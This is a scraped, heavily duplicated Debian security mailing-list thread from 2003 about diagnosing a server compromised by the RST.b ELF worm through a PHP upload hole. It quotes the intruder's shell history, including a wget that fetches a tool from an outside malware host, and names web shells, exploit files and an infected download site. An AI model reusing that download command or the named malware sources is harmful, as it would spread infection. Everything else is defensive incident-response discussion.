Am 2003-09-19 08:47:35, schrieb Michel Messerschmidt:
>On Thu, Sep 18, 2003 at 07:20:08PM +0200, Javier Fernández-Sanguino Peña wrote:
>Be careful!
>These files are really infected and will infect other ELF binaries if
>you execute them (and if user rights allow it).
>I've done replication tests
Am 2003-09-19 08:47:35, schrieb Michel Messerschmidt:
>On Thu, Sep 18, 2003 at 07:20:08PM +0200, Javier Fernández-Sanguino Peña wrote:
>Be careful!
>These files are really infected and will infect other ELF binaries if
>you execute them (and if user rights allow it).
>I've done replication tests
Diego Brouard wrote:
El Miércoles, 17 de Septiembre de 2003 21:29, Markus Schabel
escribió:
Hello!
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip
segfaultet. I've copied gzip from another server over the version
on
Diego Brouard wrote:
El Miércoles, 17 de Septiembre de 2003 21:29, Markus Schabel
escribió:
Hello!
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip
segfaultet. I've copied gzip from another server over the version
on this
On Fri, Sep 19, 2003 at 08:47:35AM +0200, Michel Messerschmidt wrote:
>
> Be careful!
> These files are really infected and will infect other ELF binaries if
> you execute them (and if user rights allow it).
I didn't run them just used 'strings'.
> PS: Non-viral malware is usally reported diffe
On Fri, Sep 19, 2003 at 08:47:35AM +0200, Michel Messerschmidt wrote:
>
> Be careful!
> These files are really infected and will infect other ELF binaries if
> you execute them (and if user rights allow it).
I didn't run them just used 'strings'.
> PS: Non-viral malware is usally reported diffe
On Thu, Sep 18, 2003 at 07:20:08PM +0200, Javier Fernández-Sanguino Peña wrote:
> > www.slacks.hpg.ig.com.br/bin/rh Infection: Unix/Osf.A
>
> This is an exploit to an OpenSSL bug.
>
> > www.slacks.hpg.ig.com.br/bin/mass Infection: Unix/Osf.A
>
> This is a 'massive' scanner
>
> > www.slacks.hp
On Thu, Sep 18, 2003 at 07:20:08PM +0200, Javier Fernández-Sanguino Peña wrote:
> > www.slacks.hpg.ig.com.br/bin/rh Infection: Unix/Osf.A
>
> This is an exploit to an OpenSSL bug.
>
> > www.slacks.hpg.ig.com.br/bin/mass Infection: Unix/Osf.A
>
> This is a 'massive' scanner
>
> > www.slacks.hp
rm -rf phpshell.php
^__^
was this the exploited hole ?
I think so. In fact the problem is that it got there...
probably uploaded somehow...
a upload-form, some web-script maybe?
check php permissions i'd say.
where was enr php-file located? do you know?
good luck, Jst
rm -rf phpshell.php
^__^
was this the exploited hole ?
I think so. In fact the problem is that it got there...
probably uploaded somehow...
a upload-form, some web-script maybe?
check php permissions i'd say.
where was enr php-file located? do you know?
good luck, Jst.
--
On Thu, Sep 18, 2003 at 07:02:06PM +0200, Michel Messerschmidt wrote:
>
> Might be a side effect of the tools that were used.
> A quick scan with f-prot shows several infected files on the server
> www.slacks.hpg.ig.com.br:
()
> www.slacks.hpg.ig.com.br/bin/rh Infection: Unix/Osf.A
This is
Diego Brouard schreibt:
As you've seen you have been cracked by a "worm", it's called
RST.b.
In few words, it infect exectable files in /bin and in the current directory
from where you are executing an already infected binary. You were infected
because of a php bug and the ptrace bug.
Might
On Wed, Sep 17, 2003 at 11:52:36PM +0200, Laurent Corbes {Caf'} wrote:
>
> i'm thinking about a hardware problem.
> may the harddrive is in failure (get the ouput of dmesg) or a very big
> ram problem that corrupt files on the hard drive.
By the sound of things, this is starting to sound more li
El Miércoles, 17 de Septiembre de 2003 21:29, Markus Schabel escribió:
> Hello!
>
> I've seen some strange things on my (stable with security-updates)
> server: the last apt-get update didn't work because gzip segfaultet.
> I've copied gzip from another server over the version on this server,
> but
>> - perl without tainting checks in cgi-bin?
>
>what exactly do you mean? how can i do/check that?
>
use '#!/usr/local/bin/perl -T' at the beginning of a perl cgi.
Probably it would end in some 'tainted' errors you have to solve.
For further details look into 'man perlsec'.
Christian
On Thu, Sep 18, 2003 at 03:02:04PM +0200, Markus Schabel wrote:
> Christian Storch wrote:
> >- security updates all up to date?
>
> the same state as DSA announcements
Including your kernel?
> >- known unclosed security hole?
>
> It seems that it was possible to upload & execute .php-files som
On Thu, Sep 18, 2003 at 09:03:12AM +0200, Markus Schabel wrote:
> in the directory /var/www/cncmap/www/upload/renegade there are the
> following files: backhole.pl
> e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003,
> LES-EXPLOIT for Linux x86")
> rem.php (phpRemoteView)
>
> s
On Thu, Sep 18, 2003 at 07:02:06PM +0200, Michel Messerschmidt wrote:
>
> Might be a side effect of the tools that were used.
> A quick scan with f-prot shows several infected files on the server
> www.slacks.hpg.ig.com.br:
()
> www.slacks.hpg.ig.com.br/bin/rh Infection: Unix/Osf.A
This is
Diego Brouard schreibt:
As you've seen you have been cracked by a "worm", it's called
RST.b.
In few words, it infect exectable files in /bin and in the current directory
from where you are executing an already infected binary. You were infected
because of a php bug and the ptrace bug.
Might be a
eck your scripts. It's quite easy to
open such security holes - be careful with fileuploads.
Stefan
> > -Original Message-
> > From: Markus Schabel [mailto:[EMAIL PROTECTED]
> > Sent: Thursday, September 18, 2003 12:23 PM
> > To: debian-security@lists.d
On Wed, Sep 17, 2003 at 11:52:36PM +0200, Laurent Corbes {Caf'} wrote:
>
> i'm thinking about a hardware problem.
> may the harddrive is in failure (get the ouput of dmesg) or a very big
> ram problem that corrupt files on the hard drive.
By the sound of things, this is starting to sound more li
El Miércoles, 17 de Septiembre de 2003 21:29, Markus Schabel escribió:
> Hello!
>
> I've seen some strange things on my (stable with security-updates)
> server: the last apt-get update didn't work because gzip segfaultet.
> I've copied gzip from another server over the version on this server,
> but
>> - perl without tainting checks in cgi-bin?
>
>what exactly do you mean? how can i do/check that?
>
use '#!/usr/local/bin/perl -T' at the beginning of a perl cgi.
Probably it would end in some 'tainted' errors you have to solve.
For further details look into 'man perlsec'.
Christian
--
To U
On Thu, Sep 18, 2003 at 03:02:04PM +0200, Markus Schabel wrote:
> Christian Storch wrote:
> >- security updates all up to date?
>
> the same state as DSA announcements
Including your kernel?
> >- known unclosed security hole?
>
> It seems that it was possible to upload & execute .php-files som
On Thu, Sep 18, 2003 at 09:03:12AM +0200, Markus Schabel wrote:
> in the directory /var/www/cncmap/www/upload/renegade there are the
> following files: backhole.pl
> e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003,
> LES-EXPLOIT for Linux x86")
> rem.php (phpRemoteView)
>
> s
can i do/check that?
thanks, markus
etc.
etc.
Christian
-Original Message-
From: Markus Schabel [mailto:[EMAIL PROTECTED]
Sent: Thursday, September 18, 2003 12:23 PM
To: debian-security@lists.debian.org
Subject: Re: [sec] Re: Strange segmentation faults and Zombies
maximilian attems wrot
eck your scripts. It's quite easy to
open such security holes - be careful with fileuploads.
Stefan
> > -Original Message-
> > From: Markus Schabel [mailto:[EMAIL PROTECTED]
> > Sent: Thursday, September 18, 2003 12:23 PM
> > To: [EMAIL PROTECTED]
>
Phillip Hofmeister wrote:
On Thu, 18 Sep 2003 at 09:08:28AM +0200, Markus Schabel wrote:
scp goodserver:/bin/gzip /bin/gzip
NO! Since there's the chance that the server got hacked I'm not
interested to give him other passwords. copied from the other server
via scp.
scp from the clean syste
On Thu, 18 Sep 2003 at 09:08:28AM +0200, Markus Schabel wrote:
> >scp goodserver:/bin/gzip /bin/gzip
> NO! Since there's the chance that the server got hacked I'm not
> interested to give him other passwords. copied from the other server
> via scp.
scp from the clean system into the dirty one. Th
ting checks in cgi-bin?
etc.
etc.
Christian
-Original Message-
From: Markus Schabel [mailto:[EMAIL PROTECTED]
Sent: Thursday, September 18, 2003 12:23 PM
To: debian-security@lists.debian.org
Subject: Re: [sec] Re: Strange segmentation faults and Zombies
maximilian attems wrote:
>
anks, markus
etc.
etc.
Christian
-Original Message-
From: Markus Schabel [mailto:[EMAIL PROTECTED]
Sent: Thursday, September 18, 2003 12:23 PM
To: [EMAIL PROTECTED]
Subject: Re: [sec] Re: Strange segmentation faults and Zombies
maximilian attems wrote:
On Thu, 18 Sep 2003, Christian Storch wro
Phillip Hofmeister wrote:
On Thu, 18 Sep 2003 at 09:08:28AM +0200, Markus Schabel wrote:
scp goodserver:/bin/gzip /bin/gzip
NO! Since there's the chance that the server got hacked I'm not
interested to give him other passwords. copied from the other server
via scp.
scp from the clean system into
On Thu, 18 Sep 2003 at 09:08:28AM +0200, Markus Schabel wrote:
> >scp goodserver:/bin/gzip /bin/gzip
> NO! Since there's the chance that the server got hacked I'm not
> interested to give him other passwords. copied from the other server
> via scp.
scp from the clean system into the dirty one. Th
On Thu, Sep 18, 2003 at 09:03:12AM +0200, Markus Schabel wrote:
> >wget www.slacks.hpg.com.br/bin/dos
That directory www.slacks.hpg.com.br/bin/ also contains some
'interesting' files :-) Some exploits, rootkits etc.
Jan
signature.asc
Description: Digital signature
ting checks in cgi-bin?
etc.
etc.
Christian
-Original Message-
From: Markus Schabel [mailto:[EMAIL PROTECTED]
Sent: Thursday, September 18, 2003 12:23 PM
To: [EMAIL PROTECTED]
Subject: Re: [sec] Re: Strange segmentation faults and Zombies
maximilian attems wrote:
> On Thu, 18 Se
maximilian attems wrote:
On Thu, 18 Sep 2003, Christian Storch wrote:
Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.
[..]
in /etc/.rpn theres a .bash_history with the following content:
id
mkdir /etc/.rpn
ps -aux
ps -aux | grep tbk
kill -1
On Thu, 18 Sep 2003, Christian Storch wrote:
> Don't forget to try to find the potential hole first!
> Otherwise you could have a fast recurrence.
> [..]
> > > in /etc/.rpn theres a .bash_history with the following content:
> > > >id
> > > >mkdir /etc/.rpn
> > > >ps -aux
> > > >ps -aux | grep tbk
On Thu, Sep 18, 2003 at 09:03:12AM +0200, Markus Schabel wrote:
> >wget www.slacks.hpg.com.br/bin/dos
That directory www.slacks.hpg.com.br/bin/ also contains some
'interesting' files :-) Some exploits, rootkits etc.
Jan
signature.asc
Description: Digital signature
Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.
Christian
- Original Message -
From: "Josh Carroll" <[EMAIL PROTECTED]>
To:
Sent: Thursday, September 18, 2003 9:12 AM
Subject: Re: Strange segmentation faults and Zo
maximilian attems wrote:
On Thu, 18 Sep 2003, Christian Storch wrote:
Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.
[..]
in /etc/.rpn theres a .bash_history with the following content:
id
mkdir /etc/.rpn
ps -aux
ps -aux | grep tbk
kill -15292 p
On Thu, 18 Sep 2003, Christian Storch wrote:
> Don't forget to try to find the potential hole first!
> Otherwise you could have a fast recurrence.
> [..]
> > > in /etc/.rpn theres a .bash_history with the following content:
> > > >id
> > > >mkdir /etc/.rpn
> > > >ps -aux
> > > >ps -aux | grep tbk
Backup /etc and any other data you have, and you can reference your
configuration files later
during your re-install.
At this point, re-installation is a must. Never delude yourself into thinking
you can 'recover'
from being rooted. Sure, you might be able to do so after a lot of effort/etc,
bu
Ralf Dreibrodt wrote:
Hi,
Markus Schabel wrote:
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaultet.
I've copied gzip from another server over the version on this server,
but it also crashed. Interesting was tha
Laurent Corbes {Caf'} wrote:
On Wed, 17 Sep 2003 22:29:58 +0200
Markus Schabel <[EMAIL PROTECTED]> wrote:
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaultet.
I've copied gzip from another server over the versio
Hi,
Markus Schabel wrote:
>
> I've seen some strange things on my (stable with security-updates)
> server: the last apt-get update didn't work because gzip segfaultet.
> I've copied gzip from another server over the version on this server,
> but it also crashed. Interesting was that the executabl
Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.
Christian
- Original Message -
From: "Josh Carroll" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Thursday, September 18, 2003 9:12 AM
Subject: Re: Stra
Backup /etc and any other data you have, and you can reference your configuration
files later
during your re-install.
At this point, re-installation is a must. Never delude yourself into thinking you can
'recover'
from being rooted. Sure, you might be able to do so after a lot of effort/etc, but
Ralf Dreibrodt wrote:
Hi,
Markus Schabel wrote:
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaultet.
I've copied gzip from another server over the version on this server,
but it also crashed. Interesting was that t
Laurent Corbes {Caf'} wrote:
On Wed, 17 Sep 2003 22:29:58 +0200
Markus Schabel <[EMAIL PROTECTED]> wrote:
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaultet.
I've copied gzip from another server over the version on
Hi,
Markus Schabel wrote:
>
> I've seen some strange things on my (stable with security-updates)
> server: the last apt-get update didn't work because gzip segfaultet.
> I've copied gzip from another server over the version on this server,
> but it also crashed. Interesting was that the executabl
On Wed, 17 Sep 2003 22:29:58 +0200
Markus Schabel <[EMAIL PROTECTED]> wrote:
> I've seen some strange things on my (stable with security-updates)
> server: the last apt-get update didn't work because gzip segfaultet.
> I've copied gzip from another server over the version on this server,
> but it
On Wed, 17 Sep 2003 22:29:58 +0200
Markus Schabel <[EMAIL PROTECTED]> wrote:
> I've seen some strange things on my (stable with security-updates)
> server: the last apt-get update didn't work because gzip segfaultet.
> I've copied gzip from another server over the version on this server,
> but it
Hello!
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaultet.
I've copied gzip from another server over the version on this server,
but it also crashed. Interesting was that the executable was bigger
after the segfau
Hello!
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaultet.
I've copied gzip from another server over the version on this server,
but it also crashed. Interesting was that the executable was bigger
after the segfaul
54 matches
Mail list logo
